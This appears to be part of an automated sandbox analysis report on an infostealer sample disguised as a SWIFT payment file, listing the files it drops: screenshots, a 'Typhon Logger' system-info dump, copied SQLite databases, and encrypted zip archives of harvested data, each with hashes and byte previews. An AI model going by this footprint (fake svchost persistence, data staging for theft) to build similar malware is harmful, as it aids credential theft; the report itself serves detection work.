                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.41.24.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.41.53.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.41.55.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.42.07.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76603
                                                                                      Entropy (8bit):7.743716309042433
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQKkKBbKeEIL9Pg+Pyh4207/tJRcmQTAlJ9Lxx8iU5bbkM:0kK1vLBdPy6QTAl1LoT
                                                                                      MD5:2EBAC2D514354900CD36D5ACF637E8BA
                                                                                      SHA1:BDD60D4D7619439A33B8B8ADA765E50C450DFB5E
                                                                                      SHA-256:AD48C8346FCDCDEA6B275AA8C0D67E910AB2A3DE134B38CB7C14E21E058916B3
                                                                                      SHA-512:118CF8B43FF985335BBC219DD1E0336DB99250E3AC9E362DAE05C60C6AA75DFE80C808ACA8567E54E8EBC34959096CCBEA8FE933F1F461001BFCD56FA3BC7F55
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Screenshots\Screenshot_22.05.2023-21.42.14.jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\System Info.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1272
                                                                                      Entropy (8bit):4.711956036458964
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:neSAfBxfJBO4cI7Nm7NIHKsOWrcmQDPb8RfUsP/eblVf/VtNNNUp:eS+jrO4hc2HXAmQDQRRPWblVFtNNNC
                                                                                      MD5:DBEFB28EF32E7934248E8DD07C90C8FF
                                                                                      SHA1:6D9FC5184DE80F1E48EAD9CA6E74D9029CD174C4
                                                                                      SHA-256:4856BD494B5638206BE463CC83836C9F18321DAC90FF154E374BF279DA748C9A
                                                                                      SHA-512:3172E7FA038F9694AF4E096C42B647A1A8EDC541F5D3F7B537CB8332474F3448643D3AED948DDF4EA9BC4E0B6DBE5585DEED56075802BD5EDDD0964BBAED83C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:|===========================================|..| Typhon Logger V1 |..| One of the best keyloggers on the market |..| Coded by: lernaean_hydra0 & StopDropNLoad |..| By the developers of Typhon-R Stealer |..|===========================================|...============ User Info ============..User Name = user..Machine Name = 128757..Current Language = English (United States)..Installed Languages = English (United States); ...Current Date = 22.05.2023 21:41:22..===================================...=========== System Info ============..HWID = 1B269386E0..System Version = Windows 10 Pro x64..Processor = Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Graphics card = 49_9YZLW..Memory amount = 4095MB..Anti-Virus = Windows Defender...Battery status = NoSystemBattery, (1%)..Screen size = 1280x1024....=========== Network Info ============..Public IP = 84.17.52.45..Private IP = No network adapters with an IPv4 addr

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SWIFT_USD_165092.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):612
                                                                                      Entropy (8bit):5.33730556823153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                                                      MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                                                      SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                                                      SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                                                      SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):612
                                                                                      Entropy (8bit):5.33730556823153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                                                      MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                                                      SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                                                      SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                                                      SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                                                      C:\Users\user\AppData\Local\Temp\2956d154-79a0-458c-9507-f5de6e62dd96

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\77aa76e1-9e8d-4193-9624-f537e5e34ab5

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.7876734657715041
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\8410782f-b87a-410a-a803-6bf5b1c3ff77

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.7876734657715041
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\DotNetZip-cmmx3b12.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):778434
                                                                                      Entropy (8bit):7.996164952957405
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:54j9Vbj9VjEj9V0j9VcS8DfDjVRXrESMRj9Vjuj9VjWj9VjLj9Vji:54jbbjbjEjb0jbcS8D7HXrESMRjbjujL
                                                                                      MD5:F701569F3BE6D7BF532DDF9D19C2AFEB
                                                                                      SHA1:6CC5BEABD0DD189A3615452AC53F66365F8A70B0
                                                                                      SHA-256:3BBDC796010EE600B24868E7B73A8D8DF1094532F3CD67CD83B7B958E110809D
                                                                                      SHA-512:76C192444E37DBADC059834D2BD5144E9CB3DB9F0722468A4BE15A81010262F84A87B1AFA31FD5F724EE9DBF900BC945ED26871A1A4A9852AB25C8F866D89674
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........9..V.x..<...M.....$.22-05-2023 22-47-44.txt.. .........gm]>!...gm]>!...gm]>!...SVVVH.(../J-RP.r4..t.Lu......-.L..-5...@r..E.......L.LL4..PK........I..V..............$.BuildTag.txt.. ............O!......O!......O!...PK........H..V..............$.ImportantAutofills.txt.. ..........H.N!....H.N!....H.N!...PK........G..V.5..[.........$.Installed Software.txt.. .........>.gM!...>.gM!...>.gM!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^

                                                                                      C:\Users\user\AppData\Local\Temp\DotNetZip-dd5sgyyl.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):553940
                                                                                      Entropy (8bit):7.995901837653764
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:pj9VjAj9Vjtj9VjYj9VtK0j9VtKImW9X/j9VtK5:pjbjAjbjtjbjYjbDjbhmaX/jba
                                                                                      MD5:91E0972F9334B014A130A1CA206FEC74
                                                                                      SHA1:F7B45F16A65C2C88219C24753AB66F5434830406
                                                                                      SHA-256:CCF080F4D17867E5714762A3919202CB27BCDB123E87F343BCCA66B0B73C93CF
                                                                                      SHA-512:C4CDF552E259A265CC0682C440C272850CF21F621EA7D0AB3C8B1D84984ED0512A9BE1A631019EB75F433895F3038B75E52EC9FF5FC6129366B5B0FCBB12E84B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........P..V..U.<...M.....$.22-05-2023 22-41-22.txt.. .........:..X!...:..X!...:..X!...SVVVH.(../J-RP.r4..t.Lu......-.L..,4...@r..E.......L....4..PK........h..V..............$.BuildTag.txt.. ..........3.q!....3.q!....3.q!...PK........d..V..............$.ImportantAutofills.txt.. ...........~m!.....~m!.....~m!...PK........b..V.5..[.........$.Installed Software.txt.. ..........L.j!....L.j!...C..j!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^

                                                                                      C:\Users\user\AppData\Local\Temp\[22.05.02023 20.48.14]=user@128757_1B269386E0.zip (copy)

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):778434
                                                                                      Entropy (8bit):7.996164952957405
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:54j9Vbj9VjEj9V0j9VcS8DfDjVRXrESMRj9Vjuj9VjWj9VjLj9Vji:54jbbjbjEjb0jbcS8D7HXrESMRjbjujL
                                                                                      MD5:F701569F3BE6D7BF532DDF9D19C2AFEB
                                                                                      SHA1:6CC5BEABD0DD189A3615452AC53F66365F8A70B0
                                                                                      SHA-256:3BBDC796010EE600B24868E7B73A8D8DF1094532F3CD67CD83B7B958E110809D
                                                                                      SHA-512:76C192444E37DBADC059834D2BD5144E9CB3DB9F0722468A4BE15A81010262F84A87B1AFA31FD5F724EE9DBF900BC945ED26871A1A4A9852AB25C8F866D89674
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........9..V.x..<...M.....$.22-05-2023 22-47-44.txt.. .........gm]>!...gm]>!...gm]>!...SVVVH.(../J-RP.r4..t.Lu......-.L..-5...@r..E.......L.LL4..PK........I..V..............$.BuildTag.txt.. ............O!......O!......O!...PK........H..V..............$.ImportantAutofills.txt.. ..........H.N!....H.N!....H.N!...PK........G..V.5..[.........$.Installed Software.txt.. .........>.gM!...>.gM!...>.gM!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^

                                                                                      C:\Users\user\AppData\Local\Temp\[22.05.02023 21.42.13]=user@128757_1B269386E0.zip (copy)

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):553940
                                                                                      Entropy (8bit):7.995901837653764
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:pj9VjAj9Vjtj9VjYj9VtK0j9VtKImW9X/j9VtK5:pjbjAjbjtjbjYjbDjbhmaX/jba
                                                                                      MD5:91E0972F9334B014A130A1CA206FEC74
                                                                                      SHA1:F7B45F16A65C2C88219C24753AB66F5434830406
                                                                                      SHA-256:CCF080F4D17867E5714762A3919202CB27BCDB123E87F343BCCA66B0B73C93CF
                                                                                      SHA-512:C4CDF552E259A265CC0682C440C272850CF21F621EA7D0AB3C8B1D84984ED0512A9BE1A631019EB75F433895F3038B75E52EC9FF5FC6129366B5B0FCBB12E84B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
